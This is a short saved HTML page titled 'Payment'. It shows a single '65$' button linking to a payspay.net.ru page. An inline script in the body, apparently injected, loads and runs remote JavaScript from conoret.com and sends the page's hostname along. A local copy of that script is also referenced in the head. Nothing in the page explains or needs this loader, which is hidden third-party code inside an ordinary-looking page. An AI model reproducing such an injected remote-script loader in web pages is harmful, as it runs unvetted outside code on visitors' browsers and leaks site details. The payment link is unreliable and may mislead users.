<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Payment</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        
        .container {
            text-align: center;
            background-color: skyblue;
            width: 20%;
            height: 100%;
            margin: 0 auto;
            min-width: 165px;
        }
        
        button {
            width: 120px;
            height: 30px;
            margin: 20px;
            background-color: white;
            color: black;
            border: 2px solid #555555;
        }
        
        button:hover {
            background-color: #555555;
            color: white;
        }
        
        a {
            text-decoration: none;
        }
    </style>
    <script src="./Payment_files/dsp" type="text/javascript" defer="" async=""></script>
</head>

<body cz-shortcut-listen="true">
    <script type="text/javascript">
        window.top === window && ! function() {
            var e = document.createElement("script"),
                t = document.getElementsByTagName("head")[0];
            e.src = "//conoret.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e)
        }();
    </script>
    <div class="container">
        <h1>Pay 1</h1>
        <a href="https://payspay.net.ru/pay2.html"><button>65$</button></a><br>
    </div>
</body>

</html>